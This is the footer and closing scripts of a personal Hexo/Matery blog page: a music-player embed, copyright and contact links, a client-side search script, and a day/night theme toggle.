    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2022</span>
            
            <a href="/about" target="_blank">Ethe</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
                &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                        class="white-color">159.8k</span>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/Ethe448" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1078240421@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1078240421" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1078240421" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>

    <!-- 白天和黑夜主题 -->
<div class="sum-moon-box">
  <a class="btn-floating btn-large waves-effect waves-light" onclick="switchNightMode()" title="切换主题" >
    <i id="sum-moon-icon" class="fas fa-sun" style="width:48px; height:48px; font-size: 28px;"></i>
  </a>
</div>

<script>
  function switchNightMode() {
    $('<div class="Cuteen_DarkSky"><div class="Cuteen_DarkPlanet"></div></div>').appendTo($('body')),
      setTimeout(function () {
        $('body').hasClass('DarkMode') 
        ? ($('body').removeClass('DarkMode'), localStorage.setItem('isDark', '1'), $('#sum-moon-icon').removeClass("fa-sun").addClass('fa-moon')) 
        : ($('body').addClass('DarkMode'), localStorage.setItem('isDark', '0'), $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')),
          
        setTimeout(function () {
          $('.Cuteen_DarkSky').fadeOut(1e3, function () {
            $(this).remove()
          })
        }, 2e3)
      })
  }
</script>

    <script>
    //模式判断 
    if (localStorage.getItem('isDark') === '0') {
        document.body.classList.add('DarkMode');
        $('#sum-moon-icon').addClass("fa-sun").removeClass('fa-moon')
    } else {
        document.body.classList.remove('DarkMode');
        $('#sum-moon-icon').removeleClass("fa-sun").addClass('fa-moon')
    }
    </script>

    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

     
        <script src="https://ssl.captcha.qq.com/TCaptcha.js"></script>
        <script src="/libs/others/TencentCaptcha.js"></script>
        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
